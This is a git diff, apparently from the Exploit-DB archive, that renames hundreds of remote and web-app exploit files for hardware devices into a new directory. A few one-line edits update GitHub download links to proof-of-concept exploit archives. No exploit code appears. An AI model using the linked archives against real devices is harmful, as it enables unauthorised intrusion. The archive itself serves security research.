a/platforms/hardware/remote/40735.txt b/exploits/hardware/remote/40735.txt similarity index 100% rename from platforms/hardware/remote/40735.txt rename to exploits/hardware/remote/40735.txt diff --git a/platforms/hardware/remote/40736.txt b/exploits/hardware/remote/40736.txt similarity index 100% rename from platforms/hardware/remote/40736.txt rename to exploits/hardware/remote/40736.txt diff --git a/platforms/hardware/remote/40737.sh b/exploits/hardware/remote/40737.sh similarity index 100% rename from platforms/hardware/remote/40737.sh rename to exploits/hardware/remote/40737.sh diff --git a/platforms/hardware/remote/40738.sh b/exploits/hardware/remote/40738.sh similarity index 100% rename from platforms/hardware/remote/40738.sh rename to exploits/hardware/remote/40738.sh diff --git a/platforms/hardware/remote/40813.txt b/exploits/hardware/remote/40813.txt similarity index 100% rename from platforms/hardware/remote/40813.txt rename to exploits/hardware/remote/40813.txt diff --git a/platforms/hardware/remote/40858.py b/exploits/hardware/remote/40858.py similarity index 100% rename from platforms/hardware/remote/40858.py rename to exploits/hardware/remote/40858.py diff --git a/platforms/hardware/remote/40867.txt b/exploits/hardware/remote/40867.txt similarity index 100% rename from platforms/hardware/remote/40867.txt rename to exploits/hardware/remote/40867.txt diff --git a/platforms/hardware/remote/41236.py b/exploits/hardware/remote/41236.py similarity index 100% rename from platforms/hardware/remote/41236.py rename to exploits/hardware/remote/41236.py diff --git a/platforms/hardware/remote/41298.txt b/exploits/hardware/remote/41298.txt similarity index 97% rename from platforms/hardware/remote/41298.txt rename to exploits/hardware/remote/41298.txt index a1757a3a1..1320d82fe 100644 --- a/platforms/hardware/remote/41298.txt +++ b/exploits/hardware/remote/41298.txt @@ -115,4 +115,4 @@ OPTIONS: -h, --help Print this message ` -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41298.zip \ No newline at end of file diff --git a/platforms/hardware/remote/41480.txt b/exploits/hardware/remote/41480.txt similarity index 100% rename from platforms/hardware/remote/41480.txt rename to exploits/hardware/remote/41480.txt diff --git a/platforms/hardware/remote/41718.txt b/exploits/hardware/remote/41718.txt similarity index 100% rename from platforms/hardware/remote/41718.txt rename to exploits/hardware/remote/41718.txt diff --git a/platforms/hardware/remote/41719.rb b/exploits/hardware/remote/41719.rb similarity index 100% rename from platforms/hardware/remote/41719.rb rename to exploits/hardware/remote/41719.rb diff --git a/platforms/hardware/remote/41805.txt b/exploits/hardware/remote/41805.txt similarity index 97% rename from platforms/hardware/remote/41805.txt rename to exploits/hardware/remote/41805.txt index a2c8c5185..ce7651c51 100644 --- a/platforms/hardware/remote/41805.txt +++ b/exploits/hardware/remote/41805.txt @@ -130,4 +130,4 @@ BCMPatcher.tar.gz Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41805.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41805.zip \ No newline at end of file diff --git a/platforms/hardware/remote/41808.txt b/exploits/hardware/remote/41808.txt similarity index 97% rename from platforms/hardware/remote/41808.txt rename to exploits/hardware/remote/41808.txt index 484e7fd9f..d0fcc76d7 100644 --- a/platforms/hardware/remote/41808.txt +++ b/exploits/hardware/remote/41808.txt @@ -57,4 +57,4 @@ This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41808.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41808.zip \ No newline at end of file diff --git a/platforms/hardware/remote/41872.py b/exploits/hardware/remote/41872.py similarity index 100% rename from platforms/hardware/remote/41872.py rename to exploits/hardware/remote/41872.py diff --git a/platforms/hardware/remote/41895.rb b/exploits/hardware/remote/41895.rb similarity index 100% rename from platforms/hardware/remote/41895.rb rename to exploits/hardware/remote/41895.rb diff --git a/platforms/hardware/remote/41935.rb b/exploits/hardware/remote/41935.rb similarity index 100% rename from platforms/hardware/remote/41935.rb rename to exploits/hardware/remote/41935.rb diff --git a/platforms/hardware/remote/42079.txt b/exploits/hardware/remote/42079.txt similarity index 100% rename from platforms/hardware/remote/42079.txt rename to exploits/hardware/remote/42079.txt diff --git a/platforms/hardware/remote/42122.py b/exploits/hardware/remote/42122.py similarity index 100% rename from platforms/hardware/remote/42122.py rename to exploits/hardware/remote/42122.py diff --git a/platforms/hardware/remote/42176.py b/exploits/hardware/remote/42176.py similarity index 100% rename from platforms/hardware/remote/42176.py rename to exploits/hardware/remote/42176.py diff --git a/platforms/hardware/remote/42331.txt b/exploits/hardware/remote/42331.txt similarity index 100% rename from platforms/hardware/remote/42331.txt rename to exploits/hardware/remote/42331.txt diff --git a/platforms/hardware/remote/42355.c b/exploits/hardware/remote/42355.c similarity index 100% rename from platforms/hardware/remote/42355.c rename to exploits/hardware/remote/42355.c diff --git a/platforms/hardware/remote/425.c b/exploits/hardware/remote/425.c similarity index 100% rename from platforms/hardware/remote/425.c rename to exploits/hardware/remote/425.c diff --git a/platforms/hardware/remote/42587.rb b/exploits/hardware/remote/42587.rb similarity index 100% rename from platforms/hardware/remote/42587.rb rename to exploits/hardware/remote/42587.rb diff --git a/platforms/hardware/remote/42726.py b/exploits/hardware/remote/42726.py similarity index 100% rename from platforms/hardware/remote/42726.py rename to exploits/hardware/remote/42726.py diff --git a/platforms/hardware/remote/42787.txt b/exploits/hardware/remote/42787.txt similarity index 100% rename from platforms/hardware/remote/42787.txt rename to exploits/hardware/remote/42787.txt diff --git a/platforms/hardware/remote/42888.sh b/exploits/hardware/remote/42888.sh similarity index 100% rename from platforms/hardware/remote/42888.sh rename to exploits/hardware/remote/42888.sh diff --git a/platforms/hardware/remote/43055.rb b/exploits/hardware/remote/43055.rb similarity index 100% rename from platforms/hardware/remote/43055.rb rename to exploits/hardware/remote/43055.rb diff --git a/platforms/hardware/remote/43061.txt b/exploits/hardware/remote/43061.txt similarity index 100% rename from platforms/hardware/remote/43061.txt rename to exploits/hardware/remote/43061.txt diff --git a/platforms/hardware/remote/43105.txt b/exploits/hardware/remote/43105.txt similarity index 100% rename from platforms/hardware/remote/43105.txt rename to exploits/hardware/remote/43105.txt diff --git a/platforms/hardware/remote/43118.txt b/exploits/hardware/remote/43118.txt similarity index 100% rename from platforms/hardware/remote/43118.txt rename to exploits/hardware/remote/43118.txt diff --git a/platforms/hardware/remote/43142.c b/exploits/hardware/remote/43142.c similarity index 100% rename from platforms/hardware/remote/43142.c rename to exploits/hardware/remote/43142.c diff --git a/platforms/hardware/remote/4522.html b/exploits/hardware/remote/4522.html similarity index 93% rename from platforms/hardware/remote/4522.html rename to exploits/hardware/remote/4522.html index 3440a03e9..bcea9e050 100644 --- a/platforms/hardware/remote/4522.html +++ b/exploits/hardware/remote/4522.html @@ -27,7 +27,7 @@ EDB Note: Old filename: 10112007-iphone.tif --> - + # milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/platforms/hardware/remote/4744.txt b/exploits/hardware/remote/4744.txt similarity index 100% rename from platforms/hardware/remote/4744.txt rename to exploits/hardware/remote/4744.txt diff --git a/platforms/hardware/remote/4797.pl b/exploits/hardware/remote/4797.pl similarity index 100% rename from platforms/hardware/remote/4797.pl rename to exploits/hardware/remote/4797.pl diff --git a/platforms/hardware/remote/4941.txt b/exploits/hardware/remote/4941.txt similarity index 100% rename from platforms/hardware/remote/4941.txt rename to exploits/hardware/remote/4941.txt diff --git a/platforms/hardware/remote/5113.txt b/exploits/hardware/remote/5113.txt similarity index 100% rename from platforms/hardware/remote/5113.txt rename to exploits/hardware/remote/5113.txt diff --git a/platforms/hardware/remote/5150.txt b/exploits/hardware/remote/5150.txt similarity index 100% rename from platforms/hardware/remote/5150.txt rename to exploits/hardware/remote/5150.txt diff --git a/platforms/hardware/remote/5289.txt b/exploits/hardware/remote/5289.txt similarity index 100% rename from platforms/hardware/remote/5289.txt rename to exploits/hardware/remote/5289.txt diff --git a/platforms/hardware/remote/5313.txt b/exploits/hardware/remote/5313.txt similarity index 100% rename from platforms/hardware/remote/5313.txt rename to exploits/hardware/remote/5313.txt diff --git a/platforms/hardware/remote/5926.txt b/exploits/hardware/remote/5926.txt similarity index 100% rename from platforms/hardware/remote/5926.txt rename to exploits/hardware/remote/5926.txt diff --git a/platforms/hardware/remote/6155.c b/exploits/hardware/remote/6155.c similarity index 100% rename from platforms/hardware/remote/6155.c rename to exploits/hardware/remote/6155.c diff --git a/platforms/hardware/remote/6305.html b/exploits/hardware/remote/6305.html similarity index 100% rename from platforms/hardware/remote/6305.html rename to exploits/hardware/remote/6305.html diff --git a/platforms/hardware/remote/6366.c b/exploits/hardware/remote/6366.c similarity index 100% rename from platforms/hardware/remote/6366.c rename to exploits/hardware/remote/6366.c diff --git a/platforms/hardware/remote/6476.html b/exploits/hardware/remote/6476.html similarity index 100% rename from platforms/hardware/remote/6476.html rename to exploits/hardware/remote/6476.html diff --git a/platforms/hardware/remote/6477.html b/exploits/hardware/remote/6477.html similarity index 100% rename from platforms/hardware/remote/6477.html rename to exploits/hardware/remote/6477.html diff --git a/platforms/hardware/remote/6532.py b/exploits/hardware/remote/6532.py similarity index 100% rename from platforms/hardware/remote/6532.py rename to exploits/hardware/remote/6532.py diff --git a/platforms/hardware/remote/6750.txt b/exploits/hardware/remote/6750.txt similarity index 100% rename from platforms/hardware/remote/6750.txt rename to exploits/hardware/remote/6750.txt diff --git a/platforms/hardware/remote/6899.txt b/exploits/hardware/remote/6899.txt similarity index 100% rename from platforms/hardware/remote/6899.txt rename to exploits/hardware/remote/6899.txt diff --git a/platforms/hardware/remote/7055.txt b/exploits/hardware/remote/7055.txt similarity index 100% rename from platforms/hardware/remote/7055.txt rename to exploits/hardware/remote/7055.txt diff --git a/platforms/hardware/remote/7389.html b/exploits/hardware/remote/7389.html similarity index 100% rename from platforms/hardware/remote/7389.html rename to exploits/hardware/remote/7389.html diff --git a/platforms/hardware/remote/7496.txt b/exploits/hardware/remote/7496.txt similarity index 100% rename from platforms/hardware/remote/7496.txt rename to exploits/hardware/remote/7496.txt diff --git a/platforms/hardware/remote/77.c b/exploits/hardware/remote/77.c similarity index 100% rename from platforms/hardware/remote/77.c rename to exploits/hardware/remote/77.c diff --git a/platforms/hardware/remote/7712.txt b/exploits/hardware/remote/7712.txt similarity index 100% rename from platforms/hardware/remote/7712.txt rename to exploits/hardware/remote/7712.txt diff --git a/platforms/hardware/remote/7845.txt b/exploits/hardware/remote/7845.txt similarity index 100% rename from platforms/hardware/remote/7845.txt rename to exploits/hardware/remote/7845.txt diff --git a/platforms/hardware/remote/7858.php b/exploits/hardware/remote/7858.php similarity index 100% rename from platforms/hardware/remote/7858.php rename to exploits/hardware/remote/7858.php diff --git a/platforms/hardware/remote/7915.txt b/exploits/hardware/remote/7915.txt similarity index 100% rename from platforms/hardware/remote/7915.txt rename to exploits/hardware/remote/7915.txt diff --git a/platforms/hardware/remote/7920.txt b/exploits/hardware/remote/7920.txt similarity index 100% rename from platforms/hardware/remote/7920.txt rename to exploits/hardware/remote/7920.txt diff --git a/platforms/hardware/remote/7921.txt b/exploits/hardware/remote/7921.txt similarity index 100% rename from platforms/hardware/remote/7921.txt rename to exploits/hardware/remote/7921.txt diff --git a/platforms/hardware/remote/8022.txt b/exploits/hardware/remote/8022.txt similarity index 100% rename from platforms/hardware/remote/8022.txt rename to exploits/hardware/remote/8022.txt diff --git a/platforms/hardware/remote/8023.txt b/exploits/hardware/remote/8023.txt similarity index 100% rename from platforms/hardware/remote/8023.txt rename to exploits/hardware/remote/8023.txt diff --git a/platforms/hardware/remote/8096.txt b/exploits/hardware/remote/8096.txt similarity index 100% rename from platforms/hardware/remote/8096.txt rename to exploits/hardware/remote/8096.txt diff --git a/platforms/hardware/remote/8269.txt b/exploits/hardware/remote/8269.txt similarity index 96% rename from platforms/hardware/remote/8269.txt rename to exploits/hardware/remote/8269.txt index 3c1334114..ef6665df8 100644 --- a/platforms/hardware/remote/8269.txt +++ b/exploits/hardware/remote/8269.txt @@ -197,7 +197,7 @@ name="backdoor"> Proof-of-concept brute force tool available at http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) Other information: diff --git a/platforms/hardware/remote/829.c b/exploits/hardware/remote/829.c similarity index 100% rename from platforms/hardware/remote/829.c rename to exploits/hardware/remote/829.c diff --git a/platforms/hardware/remote/8316.txt b/exploits/hardware/remote/8316.txt similarity index 100% rename from platforms/hardware/remote/8316.txt rename to exploits/hardware/remote/8316.txt diff --git a/platforms/hardware/remote/8359.py b/exploits/hardware/remote/8359.py similarity index 100% rename from platforms/hardware/remote/8359.py rename to exploits/hardware/remote/8359.py diff --git a/platforms/hardware/remote/8696.txt b/exploits/hardware/remote/8696.txt similarity index 100% rename from platforms/hardware/remote/8696.txt rename to exploits/hardware/remote/8696.txt diff --git a/platforms/hardware/remote/8846.txt b/exploits/hardware/remote/8846.txt similarity index 100% rename from platforms/hardware/remote/8846.txt rename to exploits/hardware/remote/8846.txt diff --git a/platforms/hardware/remote/8963.txt b/exploits/hardware/remote/8963.txt similarity index 100% rename from platforms/hardware/remote/8963.txt rename to exploits/hardware/remote/8963.txt diff --git a/platforms/hardware/remote/9066.txt b/exploits/hardware/remote/9066.txt similarity index 100% rename from platforms/hardware/remote/9066.txt rename to exploits/hardware/remote/9066.txt diff --git a/platforms/hardware/remote/9117.txt b/exploits/hardware/remote/9117.txt similarity index 100% rename from platforms/hardware/remote/9117.txt rename to exploits/hardware/remote/9117.txt diff --git a/platforms/hardware/remote/9209.txt b/exploits/hardware/remote/9209.txt similarity index 100% rename from platforms/hardware/remote/9209.txt rename to exploits/hardware/remote/9209.txt diff --git a/platforms/hardware/remote/9422.txt b/exploits/hardware/remote/9422.txt similarity index 100% rename from platforms/hardware/remote/9422.txt rename to exploits/hardware/remote/9422.txt diff --git a/platforms/hardware/remote/9432.txt b/exploits/hardware/remote/9432.txt similarity index 100% rename from platforms/hardware/remote/9432.txt rename to exploits/hardware/remote/9432.txt diff --git a/platforms/hardware/remote/9456.txt b/exploits/hardware/remote/9456.txt similarity index 100% rename from platforms/hardware/remote/9456.txt rename to exploits/hardware/remote/9456.txt diff --git a/platforms/hardware/remote/9473.txt b/exploits/hardware/remote/9473.txt similarity index 100% rename from platforms/hardware/remote/9473.txt rename to exploits/hardware/remote/9473.txt diff --git a/platforms/hardware/remote/9498.txt b/exploits/hardware/remote/9498.txt similarity index 100% rename from platforms/hardware/remote/9498.txt rename to exploits/hardware/remote/9498.txt diff --git a/platforms/hardware/remote/9503.txt b/exploits/hardware/remote/9503.txt similarity index 100% rename from platforms/hardware/remote/9503.txt rename to exploits/hardware/remote/9503.txt diff --git a/platforms/hardware/remote/9658.txt b/exploits/hardware/remote/9658.txt similarity index 100% rename from platforms/hardware/remote/9658.txt rename to exploits/hardware/remote/9658.txt diff --git a/platforms/hardware/remote/9858.txt b/exploits/hardware/remote/9858.txt similarity index 100% rename from platforms/hardware/remote/9858.txt rename to exploits/hardware/remote/9858.txt diff --git a/platforms/hardware/remote/9862.txt b/exploits/hardware/remote/9862.txt similarity index 100% rename from platforms/hardware/remote/9862.txt rename to exploits/hardware/remote/9862.txt diff --git a/platforms/hardware/webapps/10247.txt b/exploits/hardware/webapps/10247.txt similarity index 100% rename from platforms/hardware/webapps/10247.txt rename to exploits/hardware/webapps/10247.txt diff --git a/platforms/hardware/webapps/10276.txt b/exploits/hardware/webapps/10276.txt similarity index 100% rename from platforms/hardware/webapps/10276.txt rename to exploits/hardware/webapps/10276.txt diff --git a/platforms/hardware/webapps/10347.txt b/exploits/hardware/webapps/10347.txt similarity index 100% rename from platforms/hardware/webapps/10347.txt rename to exploits/hardware/webapps/10347.txt diff --git a/platforms/hardware/webapps/10792.txt b/exploits/hardware/webapps/10792.txt similarity index 100% rename from platforms/hardware/webapps/10792.txt rename to exploits/hardware/webapps/10792.txt diff --git a/platforms/hardware/webapps/11030.txt b/exploits/hardware/webapps/11030.txt similarity index 100% rename from platforms/hardware/webapps/11030.txt rename to exploits/hardware/webapps/11030.txt diff --git a/platforms/hardware/webapps/11101.txt b/exploits/hardware/webapps/11101.txt similarity index 91% rename from platforms/hardware/webapps/11101.txt rename to exploits/hardware/webapps/11101.txt index e07202786..1056fdeb8 100644 --- a/platforms/hardware/webapps/11101.txt +++ b/exploits/hardware/webapps/11101.txt @@ -16,4 +16,4 @@ firmware versions have been confirmed to date: Detailed description available here: http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf -POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file +POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file diff --git a/platforms/hardware/webapps/11634.pl b/exploits/hardware/webapps/11634.pl similarity index 100% rename from platforms/hardware/webapps/11634.pl rename to exploits/hardware/webapps/11634.pl diff --git a/platforms/hardware/webapps/11677.txt b/exploits/hardware/webapps/11677.txt similarity index 100% rename from platforms/hardware/webapps/11677.txt rename to exploits/hardware/webapps/11677.txt diff --git a/platforms/hardware/webapps/12036.txt b/exploits/hardware/webapps/12036.txt similarity index 100% rename from platforms/hardware/webapps/12036.txt rename to exploits/hardware/webapps/12036.txt diff --git a/platforms/hardware/webapps/12092.txt b/exploits/hardware/webapps/12092.txt similarity index 91% rename from platforms/hardware/webapps/12092.txt rename to exploits/hardware/webapps/12092.txt index e2c6ae672..6bda31452 100644 --- a/platforms/hardware/webapps/12092.txt +++ b/exploits/hardware/webapps/12092.txt @@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti logged-in user. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file diff --git a/platforms/hardware/webapps/12660.txt b/exploits/hardware/webapps/12660.txt similarity index 100% rename from platforms/hardware/webapps/12660.txt rename to exploits/hardware/webapps/12660.txt diff --git a/platforms/hardware/webapps/14146.txt b/exploits/hardware/webapps/14146.txt similarity index 100% rename from platforms/hardware/webapps/14146.txt rename to exploits/hardware/webapps/14146.txt diff --git a/platforms/hardware/webapps/14264.html b/exploits/hardware/webapps/14264.html similarity index 100% rename from platforms/hardware/webapps/14264.html rename to exploits/hardware/webapps/14264.html diff --git a/platforms/hardware/webapps/14521.txt b/exploits/hardware/webapps/14521.txt similarity index 100% rename from platforms/hardware/webapps/14521.txt rename to exploits/hardware/webapps/14521.txt diff --git a/platforms/hardware/webapps/15506.txt b/exploits/hardware/webapps/15506.txt similarity index 100% rename from platforms/hardware/webapps/15506.txt rename to exploits/hardware/webapps/15506.txt diff --git a/platforms/hardware/webapps/15507.txt b/exploits/hardware/webapps/15507.txt similarity index 100% rename from platforms/hardware/webapps/15507.txt rename to exploits/hardware/webapps/15507.txt diff --git a/platforms/hardware/webapps/15666.txt b/exploits/hardware/webapps/15666.txt similarity index 100% rename from platforms/hardware/webapps/15666.txt rename to exploits/hardware/webapps/15666.txt diff --git a/platforms/hardware/webapps/15675.txt b/exploits/hardware/webapps/15675.txt similarity index 100% rename from platforms/hardware/webapps/15675.txt rename to exploits/hardware/webapps/15675.txt diff --git a/platforms/hardware/webapps/15728.txt b/exploits/hardware/webapps/15728.txt similarity index 100% rename from platforms/hardware/webapps/15728.txt rename to exploits/hardware/webapps/15728.txt diff --git a/platforms/hardware/webapps/15753.html b/exploits/hardware/webapps/15753.html similarity index 100% rename from platforms/hardware/webapps/15753.html rename to exploits/hardware/webapps/15753.html diff --git a/platforms/hardware/webapps/15810.txt b/exploits/hardware/webapps/15810.txt similarity index 100% rename from platforms/hardware/webapps/15810.txt rename to exploits/hardware/webapps/15810.txt diff --git a/platforms/hardware/webapps/16252.html b/exploits/hardware/webapps/16252.html similarity index 100% rename from platforms/hardware/webapps/16252.html rename to exploits/hardware/webapps/16252.html diff --git a/platforms/hardware/webapps/16907.rb b/exploits/hardware/webapps/16907.rb similarity index 100% rename from platforms/hardware/webapps/16907.rb rename to exploits/hardware/webapps/16907.rb diff --git a/platforms/hardware/webapps/16923.rb b/exploits/hardware/webapps/16923.rb similarity index 100% rename from platforms/hardware/webapps/16923.rb rename to exploits/hardware/webapps/16923.rb diff --git a/platforms/hardware/webapps/17112.txt b/exploits/hardware/webapps/17112.txt similarity index 100% rename from platforms/hardware/webapps/17112.txt rename to exploits/hardware/webapps/17112.txt diff --git a/platforms/hardware/webapps/17113.txt b/exploits/hardware/webapps/17113.txt similarity index 100% rename from platforms/hardware/webapps/17113.txt rename to exploits/hardware/webapps/17113.txt diff --git a/platforms/hardware/webapps/17114.txt b/exploits/hardware/webapps/17114.txt similarity index 100% rename from platforms/hardware/webapps/17114.txt rename to exploits/hardware/webapps/17114.txt diff --git a/platforms/hardware/webapps/17115.txt b/exploits/hardware/webapps/17115.txt similarity index 100% rename from platforms/hardware/webapps/17115.txt rename to exploits/hardware/webapps/17115.txt diff --git a/platforms/hardware/webapps/17116.txt b/exploits/hardware/webapps/17116.txt similarity index 100% rename from platforms/hardware/webapps/17116.txt rename to exploits/hardware/webapps/17116.txt diff --git a/platforms/hardware/webapps/17117.txt b/exploits/hardware/webapps/17117.txt similarity index 100% rename from platforms/hardware/webapps/17117.txt rename to exploits/hardware/webapps/17117.txt diff --git a/platforms/hardware/webapps/17215.txt b/exploits/hardware/webapps/17215.txt similarity index 100% rename from platforms/hardware/webapps/17215.txt rename to exploits/hardware/webapps/17215.txt diff --git a/platforms/hardware/webapps/17349.txt b/exploits/hardware/webapps/17349.txt similarity index 100% rename from platforms/hardware/webapps/17349.txt rename to exploits/hardware/webapps/17349.txt diff --git a/platforms/hardware/webapps/17376.txt b/exploits/hardware/webapps/17376.txt similarity index 100% rename from platforms/hardware/webapps/17376.txt rename to exploits/hardware/webapps/17376.txt diff --git a/platforms/hardware/webapps/17377.txt b/exploits/hardware/webapps/17377.txt similarity index 100% rename from platforms/hardware/webapps/17377.txt rename to exploits/hardware/webapps/17377.txt diff --git a/platforms/hardware/webapps/17871.txt b/exploits/hardware/webapps/17871.txt similarity index 100% rename from platforms/hardware/webapps/17871.txt rename to exploits/hardware/webapps/17871.txt diff --git a/platforms/hardware/webapps/17874.txt b/exploits/hardware/webapps/17874.txt similarity index 100% rename from platforms/hardware/webapps/17874.txt rename to exploits/hardware/webapps/17874.txt diff --git a/platforms/hardware/webapps/18061.txt b/exploits/hardware/webapps/18061.txt similarity index 100% rename from platforms/hardware/webapps/18061.txt rename to exploits/hardware/webapps/18061.txt diff --git a/platforms/hardware/webapps/18101.pl b/exploits/hardware/webapps/18101.pl similarity index 100% rename from platforms/hardware/webapps/18101.pl rename to exploits/hardware/webapps/18101.pl diff --git a/platforms/hardware/webapps/18122.txt b/exploits/hardware/webapps/18122.txt similarity index 100% rename from platforms/hardware/webapps/18122.txt rename to exploits/hardware/webapps/18122.txt diff --git a/platforms/hardware/webapps/18499.txt b/exploits/hardware/webapps/18499.txt similarity index 100% rename from platforms/hardware/webapps/18499.txt rename to exploits/hardware/webapps/18499.txt diff --git a/platforms/hardware/webapps/18503.txt b/exploits/hardware/webapps/18503.txt similarity index 100% rename from platforms/hardware/webapps/18503.txt rename to exploits/hardware/webapps/18503.txt diff --git a/platforms/hardware/webapps/18504.txt b/exploits/hardware/webapps/18504.txt similarity index 100% rename from platforms/hardware/webapps/18504.txt rename to exploits/hardware/webapps/18504.txt diff --git a/platforms/hardware/webapps/18509.html b/exploits/hardware/webapps/18509.html similarity index 100% rename from platforms/hardware/webapps/18509.html rename to exploits/hardware/webapps/18509.html diff --git a/platforms/hardware/webapps/18511.txt b/exploits/hardware/webapps/18511.txt similarity index 100% rename from platforms/hardware/webapps/18511.txt rename to exploits/hardware/webapps/18511.txt diff --git a/platforms/hardware/webapps/18517.txt b/exploits/hardware/webapps/18517.txt similarity index 100% rename from platforms/hardware/webapps/18517.txt rename to exploits/hardware/webapps/18517.txt diff --git a/platforms/hardware/webapps/18540.txt b/exploits/hardware/webapps/18540.txt similarity index 100% rename from platforms/hardware/webapps/18540.txt rename to exploits/hardware/webapps/18540.txt diff --git a/platforms/hardware/webapps/18597.txt b/exploits/hardware/webapps/18597.txt similarity index 100% rename from platforms/hardware/webapps/18597.txt rename to exploits/hardware/webapps/18597.txt diff --git a/platforms/hardware/webapps/18638.txt b/exploits/hardware/webapps/18638.txt similarity index 100% rename from platforms/hardware/webapps/18638.txt rename to exploits/hardware/webapps/18638.txt diff --git a/platforms/hardware/webapps/18646.txt b/exploits/hardware/webapps/18646.txt similarity index 100% rename from platforms/hardware/webapps/18646.txt rename to exploits/hardware/webapps/18646.txt diff --git a/platforms/hardware/webapps/18859.txt b/exploits/hardware/webapps/18859.txt similarity index 100% rename from platforms/hardware/webapps/18859.txt rename to exploits/hardware/webapps/18859.txt diff --git a/platforms/hardware/webapps/19185.txt b/exploits/hardware/webapps/19185.txt similarity index 100% rename from platforms/hardware/webapps/19185.txt rename to exploits/hardware/webapps/19185.txt diff --git a/platforms/hardware/webapps/19263.txt b/exploits/hardware/webapps/19263.txt similarity index 100% rename from platforms/hardware/webapps/19263.txt rename to exploits/hardware/webapps/19263.txt diff --git a/platforms/hardware/webapps/19526.rb b/exploits/hardware/webapps/19526.rb similarity index 100% rename from platforms/hardware/webapps/19526.rb rename to exploits/hardware/webapps/19526.rb diff --git a/platforms/hardware/webapps/19774.txt b/exploits/hardware/webapps/19774.txt similarity index 100% rename from platforms/hardware/webapps/19774.txt rename to exploits/hardware/webapps/19774.txt diff --git a/platforms/hardware/webapps/19859.txt b/exploits/hardware/webapps/19859.txt similarity index 100% rename from platforms/hardware/webapps/19859.txt rename to exploits/hardware/webapps/19859.txt diff --git a/platforms/hardware/webapps/20667.txt b/exploits/hardware/webapps/20667.txt similarity index 100% rename from platforms/hardware/webapps/20667.txt rename to exploits/hardware/webapps/20667.txt diff --git a/platforms/hardware/webapps/20877.txt b/exploits/hardware/webapps/20877.txt similarity index 100% rename from platforms/hardware/webapps/20877.txt rename to exploits/hardware/webapps/20877.txt diff --git a/platforms/hardware/webapps/21032.txt b/exploits/hardware/webapps/21032.txt similarity index 100% rename from platforms/hardware/webapps/21032.txt rename to exploits/hardware/webapps/21032.txt diff --git a/platforms/hardware/webapps/21033.txt b/exploits/hardware/webapps/21033.txt similarity index 100% rename from platforms/hardware/webapps/21033.txt rename to exploits/hardware/webapps/21033.txt diff --git a/platforms/hardware/webapps/21081.txt b/exploits/hardware/webapps/21081.txt similarity index 100% rename from platforms/hardware/webapps/21081.txt rename to exploits/hardware/webapps/21081.txt diff --git a/platforms/hardware/webapps/21134.txt b/exploits/hardware/webapps/21134.txt similarity index 100% rename from platforms/hardware/webapps/21134.txt rename to exploits/hardware/webapps/21134.txt diff --git a/platforms/hardware/webapps/21395.txt b/exploits/hardware/webapps/21395.txt similarity index 100% rename from platforms/hardware/webapps/21395.txt rename to exploits/hardware/webapps/21395.txt diff --git a/platforms/hardware/webapps/21417.py b/exploits/hardware/webapps/21417.py similarity index 100% rename from platforms/hardware/webapps/21417.py rename to exploits/hardware/webapps/21417.py diff --git a/platforms/hardware/webapps/21992.txt b/exploits/hardware/webapps/21992.txt similarity index 100% rename from platforms/hardware/webapps/21992.txt rename to exploits/hardware/webapps/21992.txt diff --git a/platforms/hardware/webapps/22005.txt b/exploits/hardware/webapps/22005.txt similarity index 100% rename from platforms/hardware/webapps/22005.txt rename to exploits/hardware/webapps/22005.txt diff --git a/platforms/hardware/webapps/22493.txt b/exploits/hardware/webapps/22493.txt similarity index 100% rename from platforms/hardware/webapps/22493.txt rename to exploits/hardware/webapps/22493.txt diff --git a/platforms/hardware/webapps/22549.txt b/exploits/hardware/webapps/22549.txt similarity index 100% rename from platforms/hardware/webapps/22549.txt rename to exploits/hardware/webapps/22549.txt diff --git a/platforms/hardware/webapps/23250.txt b/exploits/hardware/webapps/23250.txt similarity index 100% rename from platforms/hardware/webapps/23250.txt rename to exploits/hardware/webapps/23250.txt diff --git a/platforms/hardware/webapps/23498.txt b/exploits/hardware/webapps/23498.txt similarity index 100% rename from platforms/hardware/webapps/23498.txt rename to exploits/hardware/webapps/23498.txt diff --git a/platforms/hardware/webapps/23499.txt b/exploits/hardware/webapps/23499.txt similarity index 100% rename from platforms/hardware/webapps/23499.txt rename to exploits/hardware/webapps/23499.txt diff --git a/platforms/hardware/webapps/23572.txt b/exploits/hardware/webapps/23572.txt similarity index 100% rename from platforms/hardware/webapps/23572.txt rename to exploits/hardware/webapps/23572.txt diff --git a/platforms/hardware/webapps/23995.txt b/exploits/hardware/webapps/23995.txt similarity index 100% rename from platforms/hardware/webapps/23995.txt rename to exploits/hardware/webapps/23995.txt diff --git a/platforms/hardware/webapps/24202.txt b/exploits/hardware/webapps/24202.txt similarity index 100% rename from platforms/hardware/webapps/24202.txt rename to exploits/hardware/webapps/24202.txt diff --git a/platforms/hardware/webapps/24435.txt b/exploits/hardware/webapps/24435.txt similarity index 100% rename from platforms/hardware/webapps/24435.txt rename to exploits/hardware/webapps/24435.txt diff --git a/platforms/hardware/webapps/24441.txt b/exploits/hardware/webapps/24441.txt similarity index 100% rename from platforms/hardware/webapps/24441.txt rename to exploits/hardware/webapps/24441.txt diff --git a/platforms/hardware/webapps/24442.txt 